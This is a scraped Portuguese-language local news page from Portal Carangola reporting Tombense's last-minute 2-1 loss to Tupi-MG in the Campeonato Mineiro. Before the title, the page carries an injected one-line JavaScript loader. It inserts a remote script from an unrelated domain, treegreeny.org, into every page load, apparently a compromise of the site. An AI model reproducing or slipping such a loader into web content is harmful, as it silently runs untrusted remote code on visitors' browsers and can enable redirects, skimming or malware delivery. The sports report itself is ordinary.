;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Com gol aos 46 do 2º tempo, Tombense e derrota no Campeonato Mineiro. - Portal Carangola

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Com gol aos 46 do 2º tempo, Tombense e derrota no Campeonato Mineiro.

tombense_logoTupi-MG e Tombense entraram em campo em partida válida pela segunda rodada do Campeonato Mineiro, no Estádio Municipal Radialista Mário Helênio em Juiz de Fora,ambas equipes em busca da primeira vitória na competição.
Os gols da partida saíram todos no segundo tempo. Aos 30, após um cruzamento de Marco Goiano, o zagueiro Maílson, ex-Tombense, abriu o placar para a equipe de Juiz de Fora. Cinco minutos depois, Jean empatou para o Tombense. Já nos acréscimos, o meia Marco Goiano cobrou falta com perfeição para sacramentar a vitória para os donos da casa.
Com o resultado, o Tupi subiu três posições na tabela, encerrando a rodada em oitavo. Ainda sem vencer na competição, o Tombense se manteve na décima colocação. O líder do campeonato é o Atlético Mineiro, que derrotou o Mamoré por 2×0, fora de casa, chegando a duas vitórias em dois jogos. Já o Cruzeiro apenas empatou com a Caldense, no Mineirão, e permanece em quarto, com quatro pontos.
O Tupi-MG volta a campo no próximo fim de semana, contra o América-MG, às 17h, no Mário Helênio em Juiz de Fora. O Tombense vai até o Sul de Minas em Poços de Caldas , onde enfrenta a Caldense, no Ronaldão. A partida está marcada para a quinta-feira, às 19h30.
fonte:supersportes.com